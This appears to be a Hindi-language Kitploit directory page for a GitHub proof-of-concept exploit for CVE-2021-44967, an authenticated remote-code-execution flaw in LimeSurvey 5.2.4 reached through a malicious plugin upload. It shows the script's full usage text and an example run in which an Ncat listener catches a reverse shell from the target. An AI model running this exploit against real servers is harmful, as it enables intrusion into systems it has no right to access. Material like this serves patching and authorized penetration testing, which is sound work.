Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-44967 — CVE-2021-44967 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो LimeSurvey 5.2.4 में दुर्भावनापूर्ण प्लगइन अपलोड के माध्यम से रिमोट कोड निष्पादन को सक्षम करता है, जिसमें रिवर्स शेल क्षमता शामिल है। | Kitploit
उपकरण/GitHubGitHub/godylockz/cve-2021-44967
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubgodylockz/cve-2021-44967

CVE-2021-44967

CVE-2021-44967 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो LimeSurvey 5.2.4 में दुर्भावनापूर्ण प्लगइन अपलोड के माध्यम से रिमोट कोड निष्पादन को सक्षम करता है, जिसमें रिवर्स शेल क्षमता शामिल है।

रिपॉजिटरी देखें
121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-44967: LimeSurvey RCE

विवरण

यह प्रूफ-ऑफ-कॉन्सेप्ट (POC) CVE-2021-44967 का शोषण करके एक दुर्भावनापूर्ण LimeSurvey PHP प्लगइन को व्यवस्थापक के रूप में अपलोड और निष्पादित करने के लिए उपयोग किया जा सकता है ताकि रिवर्स शेल प्राप्त किया जा सके।

LimeSurvey 5.2.4 में अपलोड और इंस्टॉल प्लगइन फ़ंक्शन के माध्यम से रिमोट कोड निष्पादन (RCE) भेद्यता मौजूद है, जो एक दूरस्थ दुर्भावनापूर्ण उपयोगकर्ता को मनमाना PHP कोड फ़ाइल अपलोड करने की अनुमति दे सकती है।

गंभीरता: 8.3 उच्च वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

उपयोग

root@kitploit:~
usage: limesurvey_rce.py [-h] -t URL -u USERNAME -p PASSWORD [-f FILE] [--listen-ip LISTEN_IP] [--listen-port LISTEN_PORT] [--threads THREADS] [--sleep-time SLEEP_TIME] [--row ROW]
                         [--length LENGTH] [-a USERAGENT] [-x PROXY] [-v]

POC for CVE-2021-44967 (LimeSurvey RCE)

options:
  -h, --help            show this help message and exit
  -t, --url URL         LimeSurvey Target URL
  -u, --username USERNAME
                        LimeSurvey username
  -p, --password PASSWORD
                        LimeSurvey password
  -f, --file FILE       Custom PHP payload file
  --listen-ip LISTEN_IP
                        Listening IP / Interface
  --listen-port LISTEN_PORT
                        Listening Port
  -a, --useragent USERAGENT
                        User agent to use when sending requests
  -x, --proxy PROXY     HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
  -v, --verbose         Verbosity enabled - additional output flag

उदाहरण

root@kitploit:~
python3 limesurvey_rce.py -t https://TARGET/ -u 'USERNAME' -p 'PASSWORD'
[*] Authenticating ...
[+] Login successful!
[*] Uploading plugin ...
[*] Activating plugin ...
[*] Starting listener and sending reverse shelll ...
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from X.X.X.X:51004.
www-data@target:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

LimeSurvey सामुदायिक संस्करण 6.6.4 पर परीक्षण किया गया।

संदर्भ

  • CVE-2021-44967
  • मूल POC
टूल डाउनलोड करें